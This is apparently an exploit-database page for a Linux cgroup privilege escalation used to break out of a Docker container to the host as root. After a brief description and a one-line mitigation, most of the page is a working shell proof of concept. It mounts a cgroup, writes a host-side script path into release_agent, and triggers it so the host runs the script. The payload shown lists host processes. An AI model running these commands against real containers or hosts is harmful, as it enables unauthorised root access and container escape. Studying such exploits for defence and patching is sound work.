header-logo
Suggest Exploit
vendor:
N/A
by:
Anonymous
7.2
CVSS
HIGH
Cgroup Privilege Escalation
269
CWE
Product Name: N/A
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: No
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Linux
2020

On the host

This exploit allows an attacker to gain root privileges on a Linux system by exploiting a vulnerability in the cgroup subsystem. The exploit involves creating a cgroup, mounting it, and then writing a malicious script to the cgroup's release_agent file. The malicious script is then executed when the cgroup is released, allowing the attacker to gain root privileges.

Mitigation:

The best way to mitigate this vulnerability is to ensure that the cgroup subsystem is properly configured and that the release_agent file is not writable by unprivileged users.
Source

Exploit-DB raw data:

# On the host
docker run --rm -it --cap-add=SYS_ADMIN --security-opt apparmor=unconfined ubuntu bash

# In the container
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x

echo 1 > /tmp/cgrp/x/notify_on_release
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent

echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
chmod a+x /cmd

sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"

Navigation

Suggest Exploit

Services By CQR